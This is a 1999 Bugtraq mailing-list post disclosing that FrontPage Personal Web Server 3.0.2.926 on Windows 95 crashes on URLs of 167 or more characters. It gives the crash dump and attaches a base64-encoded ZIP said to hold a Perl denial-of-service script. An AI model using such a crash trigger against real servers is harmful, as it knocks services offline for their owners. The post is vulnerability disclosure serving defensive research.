[11321] in bugtraq
Crash FrontPage Remotely...
daemon@ATHENA.MIT.EDU (Narr0w)
Mon Aug 9 22:20:14 1999
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="----=_NextPart_000_01BEE0E6.03BD7380"
Content-Transfer-Encoding: 7bit
Message-Id: <199908071207.FAA23507@mb3.mailbank.com>
Date: Sat, 7 Aug 1999 15:03:32 +0300
Reply-To: Narr0w <Narr0w@THEHACKERS.COM>
From: Narr0w <Narr0w@THEHACKERS.COM>
X-To: bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
This is a multi-part message in MIME format.
------=_NextPart_000_01BEE0E6.03BD7380
Content-Type: text/plain; charset=KOI8-R
Content-Transfer-Encoding: 7bit
Hello BugTraq friends,
Sorry if it was already in bugtraq, but:
FrontPage PWD32/3.0.2.926 for Win'XX crashes when the url is 167+ long.
I tested it only on: Windows'95 FrontPage Server Extensions Version:
3.0.2.926 Version: FrontPage-PWS32/3.0.2.926.
Here is the error message:
VHTTPD32 caused an invalid page fault in
module VHTTPD32.EXE at 0137:0040aaed.
Registers:
EAX=010d7740 CS=0137 EIP=0040aaed EFLGS=00010202
EBX=00000000 SS=013f ESP=010d53d0 EBP=010d0074
ECX=010d7740 DS=013f ESI=010d7740 FS=13c7
EDX=000000a8 ES=013f EDI=bff92ac1 GS=0000
Bytes at CS:EIP:
ff 75 10 56 68 94 01 00 00 eb 1c 68 00 24 40 00
Stack dump:
00000010 010d7740 00000000 00000000 00000000
00000000 00000000 00000000 00000000 00000000
00000000 00000000 00000000 00000000 00000000
00000000
I attached an perl script that connects to the host & sends 167 long url.
Narr0w
------=_NextPart_000_01BEE0E6.03BD7380
Content-Type: application/octet-stream; name="DoS.zip"
Content-Transfer-Encoding: base64
Content-Description: DoS (ZIP File)
Content-Disposition: attachment; filename="DoS.zip"
UEsDBBQAAgAIAI12ByfIEdUUIwIAANwDAAAGAAAARG9TLnBsnVLbbtpAEH1mJf/D1KAWpMQ2hNLW
XAQhQFAosbDTPEAeKJ5iC2sXrZdA2+TfO2suRVWfspIte2bPmXNmJv/O3qTS/h5ze40yMVj+jcfI
szz0peDKmy/x0nv0ryr2leVYFetLpQY3wofrnzCeS+lsLSOXo+v0zo5GDiSi+gVKuOAHncnlozP5
6sN7GOEyFrziOA5dEZv1HgnX8RL6D907AoCKEBbRnHNMIB/NF6uYL6Hd6497gXU8GvRmZ2yTIgzv
XdcXixWqusHiH8V2ZzL4Bg0ol+A3hDGCOeMPKVl3oeBAIxKpas34jJt1eDVYIUHepGepomJBI6fO
U6mueXQGWk2oVc+IelIK6cItkVAHNAoCIWAkyFmGKJGnPTcr6FLQhPaBluStZcwVmF1BPVko3Q5q
U3ZPw5RZZ4U0s0Kwv75cd0gtu2xx3BY9RNkJQwnN1h54oSOekEpHPjsXnhTESd9m0PXMEry87LVP
+53hqHfzpMWdhEwB7u8AsuAx5iMPtbLdhzQTlcna547izEEvANsEC8yduSvXPukvuA0Czy5bzr65
pxoz9b8q3QizfTiUyIqkCeK6+LFE2G0UJ1hsHAq2aAJsEYl1Nhi76lRhLBT0xYaHNuUMljsaOnN5
Cs54EMVptumhwBQ4YbdCrkBw2lHKpCifUdIAdUNLcBghyy0SQQt2EEH/uItV0dH6aHMwSdFg57XP
bBr/gg2mt+2VaYr6H1BLAQIUABQAAgAIAI12ByfIEdUUIwIAANwDAAAGAAAAAAAAAAAAIAAAAAAA
AABEb1MucGxQSwUGAAAAAAEAAQA0AAAARwIAAAAA
------=_NextPart_000_01BEE0E6.03BD7380--
